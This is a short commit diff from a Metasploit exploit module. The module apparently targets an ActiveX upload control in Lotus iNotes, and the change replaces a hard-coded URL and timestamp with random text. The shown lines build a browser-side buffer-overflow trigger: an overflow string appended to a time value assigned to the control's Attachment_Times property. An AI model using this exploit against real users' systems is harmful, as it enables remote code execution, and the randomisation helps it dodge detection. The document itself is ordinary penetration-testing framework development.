swith to some random data
parent
af61438b0b
commit
8f62cd5561
|
@ -254,11 +254,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
<body>
|
||||
<object id="UploadControl" width="100%" height="100%" classid="clsid:0F2AAAE3-7E9E-4b64-AB5D-1CA24C6ACB9C">
|
||||
<param name="General_Mode" value="1">
|
||||
<param name="General_URL" value="http://localhost/iNotes/Forms85.nsf/0/">
|
||||
<param name="General_URL" value="http://#{rand_text_alpha(rand(10) + 5)}">
|
||||
</object>
|
||||
<script>
|
||||
var bof = unescape("#{my_bof}");
|
||||
var my_time = "7/20/2011 11:01:42 ";
|
||||
var my_time = "#{rand_text_numeric(2)}/#{rand_text_numeric(2)}/#{rand_text_numeric(4)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)} ";
|
||||
my_time += bof;
|
||||
my_time += " GMT";
|
||||
UploadControl.Attachment_Times = my_time;
|
||||
|
|
Loading…
Reference in New Issue